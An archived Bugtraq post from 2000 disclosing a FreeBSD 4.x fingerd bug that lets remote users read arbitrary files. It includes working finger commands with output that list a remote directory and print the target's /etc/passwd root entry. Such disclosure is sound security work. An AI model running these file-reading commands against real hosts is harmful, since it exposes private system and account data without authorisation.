Bugtraq: Re: [sa2c () and or jp: bin/21704: enabling fingerd makes files world readable]

Nmap Security Scanner

Intro

Ref Guide

Install Guide

Download

Changelog

Book

Docs
Security Lists

Bugtraq

Basics

More
Security Tools

More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

Bugtraq mailing list archives

Re: [sa2c () and or jp: bin/21704: enabling fingerd makes files world readable]

From: Przemyslaw Frasunek <venglin () FREEBSD LUBLIN PL>
Date: Tue, 3 Oct 2000 20:18:12 +0200

On Mon, Oct 02, 2000 at 08:56:40PM +0200, Przemyslaw Frasunek wrote:

If finger takes full path name as user name, it prints out contents of
that file.  Because fingerd executes finger as local information
provider, finger /path/to/file () some host prints /path/to/file at
some.host.


BTW. Problem persists only in 4.x branch. Of course, it allows also
to traverse directory structures:

riget:venglin:~> finger /etc/@lagoon | strings | head -n 3
[lagoon.freebsd.lublin.pl]
^ () ^@^L^ () ^D^A ^@^ () ^@^B^ () ^@^ () ^L^@^D^B..^ () ^@^ () ^W^A^@^T^ () ^D^Hdefaults^@^A^ () ^@^A
^ () ^@^T^ () ^H      protocols^ () ^@^ () ^B

riget:venglin:~> finger /etc/passwd () lagoon | head -n2
[lagoon.freebsd.lublin.pl]
root:*:0:0:Przemyslaw Frasunek:/home/root:/usr/local/bin/tcsh

--
* Fido: 2:480/124 ** WWW: http://www.freebsd.lublin.pl ** NIC-HDL: PMF9-RIPE *
* Inet: venglin () freebsd lublin pl ** PGP: D48684904685DF43  EA93AFA13BE170BF *

By Date By Thread

Current thread:

[sa2c () and or jp: bin/21704: enabling fingerd makes files world readable] Przemyslaw Frasunek (Oct 02)
- Re: [sa2c () and or jp: bin/21704: enabling fingerd makes files world readable] Przemyslaw Frasunek (Oct 04)
- Re: [sa2c () and or jp: bin/21704: enabling fingerd makes files world readable] Warner Losh (Oct 04)